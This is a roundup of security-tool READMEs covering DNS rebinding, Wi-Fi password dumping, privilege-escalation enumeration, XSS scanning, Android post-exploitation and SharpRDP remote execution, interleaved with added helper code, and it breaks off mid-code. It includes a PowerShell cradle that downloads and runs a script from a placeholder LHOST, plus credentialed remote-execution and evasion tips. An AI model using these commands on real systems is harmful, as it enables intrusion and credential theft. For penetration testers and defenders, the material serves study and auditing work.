  1. Message or follow me on Twitter @davidprowe
  2. Drop a note on secframe.com
  3. I am not responsible for cleanup if this is run in a production domain

Disclaimer
Please note: all tools/ scripts in this repo are released for use "AS IS" without any warranties of any kind, including, but not limited to their installation, use, or performance. We disclaim any and all warranties, either express or implied, including but not limited to any warranty of noninfringement, merchantability, and/ or fitness for a particular purpose. We do not warrant that the technology will meet your requirements, that the operation thereof will be uninterrupted or error-free, or that any errors will be corrected.
Any use of these scripts and tools is at your own risk. There is no guarantee that they have been through thorough testing in a comparable environment and we are not responsible for any damage or data loss or time loss incurred with their use.
You are responsible for reviewing and testing any scripts you run thoroughly before use in any non-testing environment. This tool is not designed for a production environment.



dnsFookup - DNS Rebinding Toolkit

DNS Rebinding framework containing:
  • a dns server obviously
  • web api to create new subdomains and control the dns server, view logs, stuff like that
  • shitty react app to make it even more comfy

What does it do?
It lets you create dns bins like a burp collaborator but it adds a bit more features... (at least it tries to)


You can specify which IPs it should resolve to and how many times; for now it only supports A records :(
Then you can see in the logs where it was requested from, what it resolved to, ...


How to run it
First of all, check the configuration in the .py files; it's usually marked by
"""
*** CONFIG ***
"""
You also should not forget to change the docker and redis passwords in
  • docker-compose.yml
  • app.py
  • dns_resources
#Set up postgres and redis
sudo docker-compose up

#in ./BE
pip3 install -r requirements.txt

python3 dns.py # to start the dns server

# for testing purposes development server is enough I think
FLASK_APP=app.py
FLASK_ENV=development
flask run

# then in ./FE
npm install
npm start

Api documentation
For the API to work you will need to be signed in. The API uses bearer tokens for authentication, and Content-Type has to be set to application/json

Registration /auth/signup
POST /auth/signup
JSON body:
{
"username": "marek",
"password": "ffffffff"
}
Response:
{
"name": "marek",
"access_token": "eyJuYW1lIjoiMTMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzNyBTZUtyM1QgVDBLM24ifQo="
}

Login /auth/login (it's the same as signup)
POST /auth/login
JSON body:
{
"username": "marek",
"password": "ffffffff"
}
Response:
{
"name": "marek",
"access_token": "eyJuYW1lIjoiMTMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzNyBTZUtyM1QgVDBLM24ifQo="
}

Logout /auth/logout
POST /auth/logout
Json body can be left blank
Response:
{
"message": "Access token has been revoked"
}

Get username
GET /api/user
Response:
{
"name": "marek"
}

Create new token /api/fookup/new
POST /api/fookup/new
JSON body:
{
"name":"dsads",
"ip_props":
{
"1":{
"ip":"123.0.0.1"
,"repeat":13

},
"2":{
"ip":"3.2.1.1",
"repeat": "4ever"
}
}
}
To get this straight
  • "name" is the name of the dns bin - it comes in handy in the frontend app
  • "ip_props" is where the magic happens
    • "somenumber" - these numbers have to be in order from 1 to however many you want (max 32), so no random numbers... the dns server will start from "1" and serve the IPs one after another as supplied; when it reaches the last IP, it resets the counter and starts from "1" again. If "4ever" is supplied in the repeat field, this loop will not continue and the domain remains stuck on the 4ever IP
      • "ip" - this is the IP to resolve to
      • "repeat" - how many times this IP should be resolved - this can be set to any positive integer, or "4ever" to never stop resolving this IP once the program gets to it
Response:
{
"subdomain": "0dd4d9083d7647e1a5fd5f1444e655ce.gel0.space"
}
this is the domain that will do the magic

Example
let's say we supplied this
{
"name":"dsads",
"ip_props":
{
"1":{
"ip":"1.1.1.1"
,"repeat":2

},
"2":{
"ip":"2.2.2.2",
"repeat": 1
}
}
}
and we are running the host command against this domain
$host {domain}
{domain} has address 1.1.1.1

$host {domain}
{domain} has address 1.1.1.1

$host {domain}
{domain} has address 2.2.2.2

$host {domain}
{domain} has address 1.1.1.1

$host {domain}
{domain} has address 1.1.1.1

$host {domain}
{domain} has address 2.2.2.2
... And this will go on and on

EXAMPLE 2 with "4ever"
{
"name":"dsads",
"ip_props":
{
"1":{
"ip":"1.1.1.1"
,"repeat":2

},
"2":{
"ip":"2.2.2.2",
"repeat": "4ever"
}
}
}
Output of host
$host {domain}
{domain} has address 1.1.1.1

$host {domain}
{domain} has address 1.1.1.1

$host {domain}
{domain} has address 2.2.2.2

$host {domain}
{domain} has address 2.2.2.2

$host {domain}
{domain} has address 2.2.2.2

$host {domain}
{domain} has address 2.2.2.2

$host {domain}
{domain} has address 2.2.2.2

It will never resolve to 1.1.1.1 ... Almost.
But there is one exception to this 4ever loop: the info about what was resolved and what should be resolved next is stored in redis with expiration set to 1 hour, so the domain will resolve to 1.1.1.1 again 1 hour after creating it. You can change this setting in the REDIS_EXP variable in dns.py and dns_resources.py

List all bins /api/fookup/listAll
GET /api/fookup/listAll
Response:
[
{
"uuid": "0dd4d9083d7647e1a5fd5f1444e655ce",
"name": "dsads"
},
{
"uuid": "ffffffffffffffffffffffffffffffff",
"name": "someothername"
}
]
This will respond with the uuids and names of all the bins you have ever created

Get properties about specific bin /api/fookup/props
POST /api/fookup/props
JSON body:
{
"uuid":"0dd4d9083d7647e1a5fd5f1444e655ce"
}
Response:
  {
"ip_props": {
"1": {
"ip": "123.0.0.0",
"repeat": 13
},
"2": {
"ip": "0.0.1.77",
"repeat": 3
}
},
"ip_to_resolve": "1",
"turn": 5,
"name": "dsads"
}
This will return all info about the dnsbin; you are already familiar with the ip_props and name parts, so I will explain the other fields
  • "ip_to_resolve": number of the IP the program should resolve to right now
  • "turn" - the number of times "ip_to_resolve" was already resolved, so when turn == repeat, ip_to_resolve will become "2" and turn will reset
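The ip_props rules above ("1".."N" served in order, each `repeat` times, wrap-around, "4ever" pinning) together with the "ip_to_resolve" and "turn" state make a small state machine. The Python below is an added example, not dnsFookup's own code: it models that state machine so you can predict exactly which answer a client sees on its n-th lookup, and validates ip_props (including rejecting invalid IPs) instead of letting a server crash on bad input. The dataclass names and `validate_ip_props` are assumptions; the sample ip_props are constructed from the docs' examples.

```python
"""Resolution-order model of a dnsFookup bin (added example, not the project's code).

Entries "1".."N" are served in order, each `repeat` times; after the last entry
the counter wraps to "1"; a repeat of "4ever" pins the bin to that IP. The two
state fields mirror the "ip_to_resolve" and "turn" values of /api/fookup/props.
"""
import ipaddress
from dataclasses import dataclass

MAX_ENTRIES = 32  # documented upper bound on ip_props keys


def validate_ip_props(ip_props: dict) -> None:
    """Reject inputs the docs rule out; raises ValueError with a reason."""
    if not ip_props or len(ip_props) > MAX_ENTRIES:
        raise ValueError(f"ip_props must have 1..{MAX_ENTRIES} entries")
    expected = [str(i) for i in range(1, len(ip_props) + 1)]
    if set(ip_props) != set(expected):          # keys must be "1".."N" with no gaps
        raise ValueError('ip_props keys must be "1".."N" without gaps')
    for key in expected:
        entry = ip_props[key]
        ipaddress.ip_address(entry["ip"])       # ValueError on junk such as "1.2.3"
        rep = entry["repeat"]
        if rep != "4ever" and not (isinstance(rep, int) and rep > 0):
            raise ValueError(f'entry {key}: repeat must be a positive int or "4ever"')


@dataclass
class DnsBin:
    ip_props: dict
    ip_to_resolve: str = "1"   # key of the entry served by the next lookup
    turn: int = 0              # how many times that entry has been served so far

    def __post_init__(self) -> None:
        validate_ip_props(self.ip_props)

    def resolve(self) -> str:
        """Return the A record for this lookup and advance the state."""
        entry = self.ip_props[self.ip_to_resolve]
        if entry["repeat"] == "4ever":
            return entry["ip"]                  # pinned: the state stops advancing
        self.turn += 1
        if self.turn >= entry["repeat"]:        # turn == repeat: move on and reset
            self.turn = 0
            nxt = str(int(self.ip_to_resolve) + 1)
            self.ip_to_resolve = nxt if nxt in self.ip_props else "1"
        return entry["ip"]


def resolution_sequence(ip_props: dict, lookups: int) -> list:
    """Answers a client receives for `lookups` consecutive queries on a fresh bin."""
    dns_bin = DnsBin(ip_props)
    return [dns_bin.resolve() for _ in range(lookups)]


if __name__ == "__main__":
    # Constructed sample matching "Example" in the docs (repeat 2, then repeat 1).
    props = {"1": {"ip": "1.1.1.1", "repeat": 2}, "2": {"ip": "2.2.2.2", "repeat": 1}}
    print(resolution_sequence(props, 6))
```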

All logs /api/fookup/logs/all
This will return all logs from all bins owned by the user. This can be a bit slow if you requested the domains 12321312 times
GET /api/fookup/logs/all
Response:
[
{
"uuid": "0dd4d9083d7647e1a5fd5f1444e655ce",
"resolved_to": "123.0.0.0",
"domain": "0dd4d9083d7647e1a5fd5f1444e655ce.gel0.space",
"origin_ip": "127.0.0.1",
"port": "41095",
"created_date": "2019-09-17 20:38:44.769560"
},
...snip...
{
"uuid": "ffffffffffffffffffffffffffffffff",
"resolved_to": "99.123.64.19",
"domain": "0dd4d9083d7647e1a5fd5f1444e655ce.gel0.space",
"origin_ip": "127.0.0.1",
"port": "51515",
"created_date": "2019-09-17 20:38:50.321975"
}
]

Logs for certain uuid /api/fookup/logs/uuid
POST /api/fookup/logs/uuid
JSON body:
{
"uuid":"0dd4d9083d7647e1a5fd5f1444e655ce"
}
Response:
[
{
"uuid": "0dd4d9083d7647e1a5fd5f1444e655ce",
"resolved_to": "123.0.0.0",
"domain": "0dd4d9083d7647e1a5fd5f1444e655ce.gel0.space",
"origin_ip": "127.0.0.1",
"port": "41095",
"created_date": "2019-09-17 20:38:44.769560"
},
...snip...
{
"uuid": "0dd4d9083d7647e1a5fd5f1444e655ce",
"resolved_to": "0.0.1.77",
"domain": "0dd4d9083d7647e1a5fd5f1444e655ce.gel0.space",
"origin_ip": "127.0.0.1",
"port": "51515",
"created_date": "2019-09-17 20:38:50.321975"
}
]

Statistics /api/statistics
This just gets the statistics for the frontend app
GET /api/statistics
Response:
{
"request_count": 420,
"created_bins": 69
}

PLEASE
If you have a bit of free time, please contribute, it means a lot to me :D

TODO
  • FE - create new token form
  • FE - show error messages on screen
  • FE - in /mybins add a brief overview of selected bin -DONE-
  • API - shorten long uuid domains? - uuid4().hex -DONE-
  • DNS SERVER except - if invalid IP is supplied dont crash -DONE-
  • FE+BE - pagination on logs
  • FE - ability to specify 4ever into repeat field
  • FE+BE - delete bin



WiFi Passview v2.0 - An Open Source Batch Script Based WiFi Passview For Windows!


WiFi Passview is an open source batch script based program that can recover your WiFi password easily in seconds. This is for Windows OS only. Basically, this scripted program has the same function as other passview software such as webpassview and mailpassview.
Disclaimer: WiFi Passview is NOT designed for malicious use! Please use this program responsibly!

ZSecurity.org
This project is posted on a cyber security educational website called zsecurity.org; you should visit the project there for more information: https://zsecurity.org

How it Works
Basically, this is the shortcut and batch-scripted version of a popular method of viewing stored WiFi profile passwords from the command prompt. This is how it works...
netsh wlan show profiles
When you use this tool, you are able to extract the WiFi passwords stored on the target machine in just seconds.

Features
This simple tool offers you the following features...
  • Extract all available WiFi passwords stored on the target machine, in just seconds.
  • Extract password from specific target SSID.
  • Save extracted passwords.
  • Additional options.
  • No manual reading of Key Content, the tool will do that for you!
  • Standalone batch program.
  • Customizable.

Usage
Download the repository and look for "wifi-passview-vX.X.X.bat" file and open it and run as administrator. All you have to do is to follow the on-screen instructions.
Wanna use for WiFi Hacking? Visit this blog...

In Action
Here's how this tool works...


Don't forget to like, share, and subscribe to my channel!

White Label / Personalize / Custom
  • Download the repository
  • Do "npm install" and "npm install gulp-cli -g && npm install gulp -D"
  • After that, edit the "./src/config.json" file for your customization or personalization.
  • When you are satisfied, just do "gulp build" or "gulp" to initiate the building process.
  • If you want to reset the building process just do "gulp cleandev".

Contributing
Contributions are welcome, create a pull request to this repo and I will review your code.

Issues
If you're facing a problem in using WiFi Passview please let me know by creating an issue in this github repository. I'm happy to help you! Don't forget to provide some screenshot or error logs of it!

To Do
  • Gulp Options
  • CI (Travis)
  • More... (have suggestions? let me know!)

Author
This project is created by Waren Gonzaga for educational purposes.



XCTR Hacking Tools - All in one tools for Information Gathering


All in one tools for Information Gathering.
Instagram: Capture the Root

Screenshots








Read Me
Initially, you need to create a project where you will save everything.
All of the collected information is saved as "project-name" in results directory.
You can update user agent and proxy information in the settings section and also update url, proxy, project name, wordlist, thread numbers.

Features
This tool includes:
  • Dork Finder
  • Admin Panel Finder
  • Cms Finder
  • Ip History
  • Reverse Ip
  • Page Viewer
  • Proxy Finder

Installation

Installation with requirements.txt
git clone https://github.com/capture0x/XCTR-Hacking-Tools/
cd xctr-hacking-tools
pip3 install -r requirements.txt

Usage
python3 xctr.py
All results save in results/project-name.

Dork Finder
The dork finder has 2 sections: Bing and Yandex.
e.g:
*.php?id=

Admin Panel Finder
In this section, you first need to choose a wordlist for scanning.
Press 2 to change the wordlist and login.
The URL should be of the form https://targetsite.com/ (http or https, and the / symbol at the end of the URL).
If scanning is slow, update the proxies (press 3 to update).

Cms Finder
You'll find the CMS version from the meta name.

Ip History
This tool displays and saves the IP history of the domain.
e.g usage:
targetsite.com

Reverse Ip
With this tool, you can find the domains hosted on a server.
e.g usage:
212.57.147.54

Page Viewer
You can increase the number of page views of the target site.
e.g usage:
https://targetsite.com

Proxy Finder
This tool finds proxies on free-proxy-list.net and updates proxy.txt in the main directory.

Known Issues
--

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us by email: capture0x@mail.com.tr
Copyright 2020



TwitWork - Monitor Twitter Stream


Monitor twitter stream.
TwitWork uses the Twitter stream, which gives you tweets in real time.
There is an input that allows you to filter the flow on one (or more) keywords, or on an @ handle, based on Twitter tracking.

Demo
This is a demo of export data on keyword "Coronavirius"
https://twitwork.github.io/


Require
  • NodeJs
  • Npm
  • Twitter api key

Installation
git clone https://github.com/atmoner/TwitWork.git
cd TwitWork
npm install
Run it
npm start

Development setup
For the improvement of the software, do not hesitate to make your proposal in the support section

To Do
  • Main menu
    • Add/save file
    • Edit API key
    • Setting
  • Core
    • Hashtag extract
    • Add node/edge for hashtag

Meta
atmon3r – @atmon3r – contact.atmoner@gmail.com



PrivescCheck - Privilege Escalation Enumeration Script For Windows


This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation.
I built on the amazing work done by @harmj0y and @mattifestation in PowerUp. I added more checks and also tried to reduce the amount of false positives.
It's still a Work-in-Progress because there are a few more checks I want to implement but it's already quite complete. If you have any suggestion (improvements, features), feel free to contact me on Twitter @itm4n.

Usage
Use the script from a PowerShell prompt.
PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force 
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
Display output and write to a log file at the same time.
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object "C:\Temp\result.txt"
Use the script from a CMD prompt.
C:\Temp\>powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck"
Import the script from a web server.
C:\Temp\>powershell "IEX (New-Object Net.WebClient).DownloadString('http://LHOST:LPORT/Invoke-PrivescCheck.ps1'); Invoke-PrivescCheck" 

Yet another Windows Privilege escalation tool, why?
I really like PowerUp because it can enumerate common vulnerabilities very quickly and without using any third-party tools. The problem is that it hasn't been updated for several years now. The other issue I spotted quite a few times over the years is that it sometimes returns false positives which are quite confusing.
Other tools exist on GitHub but they are not as complete or they have too many dependencies. For example, they rely on WMI calls or other command outputs.
Therefore, I decided to make my own script with the following constraints in mind:
  • It must not use third-party tools such as accesschk.exe from SysInternals.
  • It must not use built-in Windows commands such as whoami.exe or netstat.exe. The reason for this is that I want my script to be able to run in environments where AppLocker (or any other Application Whitelisting solution) is enforced.
  • It must not use built-in Windows tools such as sc.exe or tasklist.exe because you'll often get an Access denied error if you try to use them on Windows Server 2016/2019 for instance.
  • It must not use WMI because its usage can be restricted to admin-only users.
  • Last but not least, it must be compatible with PowerShell Version 2.

Addressing all the constraints...
  • Third-party tools
I have no merit, I reused some of the code made by @harmj0y and @mattifestation. Indeed, PowerUp has a very powerful function called Get-ModifiablePath which checks the ACL of a given file path to see if the current user has write permissions on the file or folder. I modified this function a bit to avoid some false positives though. Before that, a service command line argument such as /svc could be identified as a vulnerable path because it was interpreted as C:\svc. My other contribution is that I made a registry-compatible version of this function (Get-ModifiableRegistryPath).
  • Windows built-in commands/tools
When possible, I naturally replaced them with built-in PowerShell commands such as Get-Process. In other cases, such as netstat.exe, you won't get as much information as you would with basic PowerShell commands. For example, with PowerShell, TCP/UDP listeners can easily be listed but there is no easy way to get the associated Process ID. In this case, I had to invoke Windows API functions.
  • WMI
You can get a looooot of information through WMI, that's great! But, if you face a properly hardened machine, the access to this interface will be restricted. So, I had to find workarounds. And here comes the Registry! Common checks are based on some registry keys but it has a lot more to offer. The best example is services. You can get all the information you need about every single service (except their current state obviously) simply by browsing the registry. This is a huge advantage compared to sc.exe or Get-Service which depend on the access to the Service Control Manager.
  • PowerShellv2 support
This wasn't that easy because newer versions of PowerShell have very convenient functions or options. For example, the Get-LocalGroup function doesn't exist and Get-ChildItem doesn't have the -Depth option in PowerShellv2. So, you have to work your way around each one of these small but time-consuming issues.
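The Get-ModifiablePath false positive (a "/svc" argument read as C:\svc) and the unquoted-path check both come down to splitting a service ImagePath correctly. As an added illustration that is not PrivescCheck's own code, the Python below parses ImagePath strings as read from the Services registry key, keeps switches such as /svc in the argument list rather than the path list, and for unquoted paths with spaces lists the directories an administrator would audit for write access by unprivileged users. `SAMPLE_ENV`, the function names and the sample paths are constructed assumptions; registry access is left out so the logic runs on any OS.

```python
"""ImagePath parsing behind unquoted-path and modifiable-binary service checks.

Added example, not PrivescCheck's code. Given the raw ImagePath of a service
under HKLM\\SYSTEM\\CurrentControlSet\\Services, work out which executable the
Service Control Manager really starts and, for an unquoted path with spaces,
which shorter paths CreateProcess would try first. Switches such as "/svc"
stay in `arguments` and are never reported as paths.
"""
import ntpath
import re
from dataclasses import dataclass, field

# Constructed stand-in for the service environment on a real host.
SAMPLE_ENV = {"SystemRoot": r"C:\Windows", "ProgramFiles": r"C:\Program Files"}


def expand_env(path: str, env: dict = SAMPLE_ENV) -> str:
    """Expand %VAR% references (case-insensitively, as Windows does)."""
    def lookup(m: "re.Match") -> str:
        name = m.group(1).lower()
        return next((v for k, v in env.items() if k.lower() == name), m.group(0))
    return re.sub(r"%(\w+)%", lookup, path)


@dataclass
class ImagePathInfo:
    binary: str                  # executable that will actually be launched
    arguments: str               # trailing switches/args, e.g. "/svc"
    quoted: bool
    hijack_candidates: list = field(default_factory=list)  # tried before `binary`


def parse_image_path(image_path: str) -> ImagePathInfo:
    s = expand_env(image_path.strip())
    if s.startswith('"'):                           # quoted path: unambiguous
        end = s.find('"', 1)
        return ImagePathInfo(s[1:end], s[end + 1:].strip(), True)
    tokens = s.split(" ")
    # Arguments begin at the first switch-like token; tokens before it form the path.
    arg_start = next((i for i, t in enumerate(tokens) if t[:1] in ("/", "-")), len(tokens))
    path_tokens, arg_tokens = tokens[:arg_start], tokens[arg_start:]
    candidates, binary_end = [], 0
    for i in range(1, len(path_tokens) + 1):
        prefix = " ".join(path_tokens[:i])
        if prefix.lower().endswith(".exe") or i == len(path_tokens):
            binary_end = i
            break
        candidates.append(prefix + ".exe")          # e.g. C:\Program.exe
    binary = " ".join(path_tokens[:binary_end])
    arguments = " ".join(path_tokens[binary_end:] + arg_tokens)
    return ImagePathInfo(binary, arguments, False, candidates)


def directories_to_protect(info: ImagePathInfo) -> list:
    """Folders whose ACLs must deny write access to unprivileged users."""
    dirs = []
    for p in info.hijack_candidates + [info.binary]:
        d = ntpath.dirname(p)
        if d and d not in dirs:
            dirs.append(d)
    return dirs


if __name__ == "__main__":
    # Constructed sample: unquoted path with spaces plus a "/svc" switch.
    info = parse_image_path(r"C:\Program Files\Foo\svc.exe /svc")
    print(info)
    print(directories_to_protect(info))
```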

Features

Current User
Invoke-UserCheck - Gets the username and SID of the current user
Invoke-UserGroupsCheck - Enumerates groups the current user belongs to except default and low-privileged ones
Invoke-UserPrivilegesCheck - Enumerates the high potential privileges of the current user's token

Services
Invoke-InstalledServicesCheck - Enumerates non-default services
Invoke-ServicesPermissionsCheck - Enumerates the services the current user can modify through the service control manager
Invoke-ServicesPermissionsRegistryCheck - Enumerates services that can be modified by the current user in the registry
Invoke-ServicesImagePermissionsCheck - Enumerates all the services that have a modifiable binary (or argument)
Invoke-ServicesUnquotedPathCheck - Enumerates services with an unquoted path that can be exploited

Dll Hijacking
Invoke-DllHijackingCheck - Checks whether any of the system path folders is modifiable

Programs
Invoke-InstalledProgramsCheck - Enumerates the applications that are not installed by default
Invoke-ModifiableProgramsCheck - Enumerates applications which have a modifiable EXE or DLL file
Invoke-RunningProcessCheck - Enumerates the running processes

Credentials
Invoke-SamBackupFilesCheck - Checks common locations for the SAM/SYSTEM backup files
Invoke-UnattendFilesCheck - Enumerates Unattend files and extracts credentials
Invoke-WinlogonCheck - Checks credentials stored in the Winlogon registry key
Invoke-CredentialFilesCheck - Lists the Credential files that are stored in the current user AppData folders
Invoke-VaultCredCheck - Enumerates credentials saved in the Credential Manager
Invoke-VaultListCheck - Enumerates web credentials saved in the Credential Manager
Invoke-GPPPasswordCheck - Lists Group Policy Preferences (GPP) containing a non-empty "cpassword" field

Registry
Invoke-UacCheck - Checks whether UAC (User Access Control) is enabled
Invoke-LapsCheck - Checks whether LAPS (Local Admin Password Solution) is enabled
Invoke-PowershellTranscriptionCheck - Checks whether PowerShell Transcription is configured/enabled
Invoke-RegistryAlwaysInstallElevatedCheck - Checks whether the AlwaysInstallElevated key is set in the registry
Invoke-LsaProtectionsCheck - Checks whether LSASS is running as a Protected Process (+ additional checks)

Network
Invoke-TcpEndpointsCheck - Enumerates unusual TCP endpoints on the local machine (IPv4 and IPv6)
Invoke-UdpEndpointsCheck - Enumerates unusual UDP endpoints on the local machine (IPv4 and IPv6)

Misc
Invoke-WindowsUpdateCheck - Checks the last update time of the machine
Invoke-SystemInfoCheck - Gets the name of the operating system and the full version string
Invoke-LocalAdminGroupCheck - Enumerates the members of the default local admin group
Invoke-MachineRoleCheck - Gets the role of the machine (workstation, server, domain controller)
Invoke-SystemStartupHistoryCheck - Gets a list of system startup events
Invoke-SystemStartupCheck - Gets the last system startup time
Invoke-SystemDrivesCheck - Gets a list of local drives and network shares that are currently mapped



Phonia Toolkit - One Of The Most Advanced Toolkits To Scan Phone Numbers Using Only Free Resources


Phonia Toolkit is one of the most advanced toolkits to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with a very good accuracy.

Getting started

Phonia installation
cd phonia
chmod +x install.sh
./install.sh

Phonia uninstallation
cd phonia
chmod +x uninstall.sh
./uninstall.sh

Phonia Toolkit execution
phonia -h
usage: phonia [-h] [-p <phone>] [-i <inputfile>] [-o <outputfile>]
[-s <scanner>] [--recon] [--no-ansi] [-u]

optional arguments:
-h, --help show this help message and exit
-p <phone>, --phone <phone>
The phone number to scan.
-i <inputfile>, --input <inputfile>
List of phone numbers to scan.
-o <outputfile>, --output <outputfile>
Output to save scan results.
-s <scanner>, --scanner <scanner>
The scanner to use.
--recon Launch custom format reconnaissance.
--no-ansi Disable colored output.
- u, --update Update Phonia Toolkit.

Phonia Toolkit examples
Example of the phonia basic scan
phonia -p 15554443333
Example of the scanning from a file
phonia -i input.txt -o output.txt
Example of the selecting number scanner
phonia -p 15554443333 -s footprints

Phonia Toolkit disclaimer
Usage of the Phonia Toolkit for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



Extended-XSS-Search - Scans For Different Types Of XSS On A List Of URLs


This is the extended version based on the initial idea already published as "xssfinder". This private version allows an attacker to perform not only GET but also POST requests. Additionally, it's possible to proxy every request through Burp or another tunnel.

First steps
Rename the example.app-settings.conf to app-settings.conf and adjust the settings. It should work out of the box but depending on the target I would recommend to resize the chunk sizes.

Execution
This tool does not expect any arguments via CLI, so just type:
python3 extended-xss-search.py

Configuration
It's possible to set a lot of options and settings, so here are some explanations.

Files
The main config file is the "app-settings.conf", everything has to be done in that file! Besides that, there are some other files which allow to set more complex data like headers, urls and cookies.
config/cookie-jar.txt
Use this file to add a cookie string. I usually copy the one which you can see in every burp request. Please just copy the value of the "Cookie:"-header. A sample input is in the default file.
config/http-headers.txt
This file defines the http headers which are added to the request and manipulated (payload is added to each one). The most important ones are already in the file. But feel free to add more.
config/parameters.txt
The tool has the option to brute force get and post parameters. In that case those parameters (+ those in the query string) will be used. Each parameter gets the payload as value. Most important are already in that file.
config/urls-to-test.txt
That's the file you need! Please add your links to scan here. The following formats are allowed:
When the last case is detected, "http://" is prepended. This tool is intended to work with a good list of urls. A good way to get one is to just export it using burp. Then you have a valid list of urls. All you need to do is add your cookies.
logs/
This is the log folder where everything gets logged to!

Settings
The app-settings.conf defines the program workflow. It's the most important file; you can activate/deactivate different modules there.
Basic settings
HTTPTimeout
Some requests can take long. Here you can define the max. execution time of one request. I recommend values between 2 and 6 seconds.
MaxThreads
The more threads, the faster the script is - but since we are dealing with a lot of connections I usually keep this below 10 on my personal computer and around 30 on my VPS.
Attack types
OnlyBaseRequest
Setting this to true will result in only "base requests" - this means the url list is just spidered and interesting parameters extracted. You could use that to fill your burp sitemap quickly.
UsePost
You can skip POST requests by setting this to "false"
UseGet
This is similar - skip GET requests if set to "false"
Attack type settings
GetChunkSize
How many GET parameters to test with one request?
PostChunkSize
How many POST parameters to test with one request?
Tunneling
It's also possible to use a tunnel, e.g. "127.0.0.1:8080" (Burp Proxy), to monitor all traffic within Burp.
Active
Setting this to "true" will force the script to use a tunneled connection.
Tunnel
Set here your proxy server "ip:port".
The result is the following one, when you open Burp you can watch your http history:


Screenshot





Ghost Framework - An Android Post Exploitation Framework That Uses An Android Debug Bridge To Remotely Access An Android Device



Ghost Framework is an Android post exploitation framework that uses an
Android Debug Bridge to remotely access an Android device. Ghost Framework
gives you the power and convenience of remote Android device administration.

Getting started

Ghost installation
cd ghost
chmod +x install.sh
./install.sh

Ghost uninstallation
cd ghost
chmod +x uninstall.sh
./uninstall.sh

Ghost Framework execution
To execute Ghost Framework, run the following command.
ghost

Why Ghost Framework
  • Accessing device shell: Ghost Framework can be used to access the remote Android device shell without using OpenSSH or other protocols.
  • Emulating device button presses: Ghost Framework can be used to emulate button presses on the remote Android device.
  • Removing device password: Ghost Framework can be used to remove the remote Android device password if it was forgotten.


Ghost Framework disclaimer
Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



SharpRDP - Remote Desktop Protocol .NET Console Application For Authenticated Command Execution


To compile, open the project in Visual Studio and build for Release. Two DLLs will be output to the Release directory; you do not need those, because the DLLs are embedded in the assembly. If you do not want to use the provided DLLs, you will need the .NET SDK to create the AxMSTSCLib.dll DLL. To create it, run aximp from the SDK on mstscax.dll: %<SDK dir>%\aximp.exe %windir%\system32\mstscax.dll. Those DLLs will need to be referenced by the project to get the Interop DLLs created. You will also need to compress the DLLs with Deflate and name them AxInterop.MSTSCLib.dll.bin and Interop.MSTSCLib.dll.bin.

Usage
Regular RDP connection and execution
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
Exec program as child process of cmd or powershell
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password exec=cmd
Use restricted admin mode
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe"
Connect first host drives
SharpRDP.exe computername=domain.target command="\\tsclient\C\Temp\file.exe" username=domain\user password=password connectdrive=true
Execute command elevated through Run Dialog - CURRENTLY BUGGED
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password elevated=winr
Execute command elevated through task manager
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password elevated=taskmgr
Add Network Level Authentication
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password nla=true
Ask to take over logon session
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password takeover=true
If restricted admin mode is enabled on the target, do not specify any credentials and it will use the current user context. You can PTH or make_token in Beacon, or runas /netonly on a Windows system.
All execution starts with the Windows Run dialog (Win+R). A registry key will be created at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU containing the command that you executed. If you want to remove this you can use CleanRunMRU: Get or clear RunMRU values.
Keep in mind that if you execute a program like msbuild (I'm sure there are others), a cmd window will pop up while the process is running. If you do, it would probably be best to migrate the process and kill the original.
The required DLLs are compiled into the assembly and the AppDomain AssemblyResolve event is used to load them. Because of the size of the DLLs, they are compressed and decompressed at runtime (so they can meet Beacon's 1MB size limit).
A blog post about it can be found here: SharpRDP
Also part of MoveKit
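The RunMRU key named above is the artifact a responder would check for Run-dialog launches. As an added triage example (not code from SharpRDP, CleanRunMRU or MoveKit), this PowerShell lists the RunMRU entries in most-recent-first order; the function name, the `Temp` pattern in the final filter, and the offline-hive parameter are this example's own choices.

```powershell
# Added example, not part of the SharpRDP project.
# RunMRU keeps each launched command under a single-letter value ("a", "b", ...)
# with a trailing "\1"; the MRUList value holds those letters in recency order.
function Get-RunMRUHistory {
    param(
        # Live current-user hive by default. For an offline NTUSER.DAT, load it
        # with reg.exe under HKU and pass that mounted path instead (assumption).
        [string]$KeyPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    )
    if (-not (Test-Path -Path $KeyPath)) {
        # No key at all: either never used, or cleared (e.g. by CleanRunMRU).
        return @()
    }
    $key   = Get-ItemProperty -Path $KeyPath
    $order = [string]$key.MRUList          # e.g. "cba": "c" is the newest entry
    $position = 0
    foreach ($slot in $order.ToCharArray()) {
        $position++
        $raw = $key.PSObject.Properties[[string]$slot].Value
        if ($null -eq $raw) { continue }   # dangling letter, no value behind it
        [pscustomobject]@{
            Order   = $position
            Slot    = [string]$slot
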